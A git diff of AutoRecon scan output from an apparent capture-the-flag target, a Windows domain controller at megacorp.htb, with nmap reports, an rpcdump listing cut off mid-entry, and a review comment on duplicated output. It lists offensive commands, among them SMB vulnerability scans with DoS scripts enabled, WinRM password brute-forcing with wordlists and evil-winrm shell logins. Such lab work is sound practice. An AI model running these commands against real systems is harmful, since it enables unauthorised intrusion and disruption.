Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. 
+
+ dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt
+
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log
new file mode 100644
index 00000000..e104793b
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log
@@ -0,0 +1,8 @@
+Identified Architecture: 64-bit
+
+Identified HTTP Server: Microsoft-IIS/10.0
+
+Identified Architecture: 64-bit
+
+Identified HTTP Server: Microsoft-IIS/10.0
+
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt
new file mode 100644
index 00000000..f5299e55
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt
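Review bot: The AutoRecon suggestion list in `_manual_commands.txt` is stored three times over: the section that opens with `[*] domain on tcp/53` recurs twice more further down, the first two passes with the domain argument left empty (`dnsrecon … -d -D …`) and only the last one filled in with `megacorp.htb`, so most of the 338 added lines are superseded output from earlier runs. Keeping only the final pass would make the artifact readable and the diff reviewable. Every output path in it also embeds the operator's absolute home directory (`/home/simon/CTF/…`), and the same is true of the `_errors.log` and nmap report hunks in this commit. If raw scan results need to live in the repository at all, an ignore rule such as `LaokoonHaxorcist/fullpwn/results/` in `.gitignore`, or paths rewritten relative to the challenge folder, would keep workstation details out of a shared history.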
@@ -0,0 +1,67 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.061s latency). +Scanned at 2023-10-28 14:23:46 CEST for 449s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain? syn-ack ttl 127 +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? 
syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +No OS matches for host +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFF13%P=x86_64-pc-linux-gnu) +SEQ(SP=108%GCD=1%ISR=10A%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=264 (Good luck!) +IP ID Sequence Generation: Busy server or unknown class +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 0s +| smb2-time: +| date: 2023-10-28T12:30:36 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 53/tcp) +HOP RTT ADDRESS +1 74.01 ms 10.10.14.1 +2 74.05 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
+# Nmap done at Sat Oct 28 14:31:15 2023 -- 1 IP address (1 host up) scanned in 449.29 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt new file mode 100644 index 00000000..3c8842ba --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt 
@@ -0,0 +1,38 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.055s latency). +Scanned at 2023-10-28 14:23:46 CEST for 1767s +Not shown: 97 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +123/udp open ntp udp-response ttl 127 NTP v3 +| ntp-info: +|_ receive time stamp: 2023-10-28T12:30:46 +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFD6C%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653D0439%P=x86_64-pc-linux-gnu) +U1(R=N) +IE(R=N) + +Network Distance: 2 hops +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 14s + +TRACEROUTE (using port 123/udp) +HOP RTT ADDRESS +1 44.38 ms 10.10.14.1 +2 57.06 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:13 2023 -- 1 IP address (1 host up) scanned in 1767.23 seconds 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt new file mode 100644 index 00000000..1b90fd81 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt @@ -0,0 +1,6 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Gathering OS architecture for 1 machines +[*] Socket connect timeout set to 2 secs +10.129.243.131 is 64-bit + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt new file mode 100644 index 00000000..50dbfb88 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.62s latency). +Scanned at 2023-10-28 14:27:56 CEST for 23s + +PORT STATE SERVICE REASON VERSION +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:19 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt 
@@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: 
N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + 
ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + 
ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + 
ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group 
Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw 
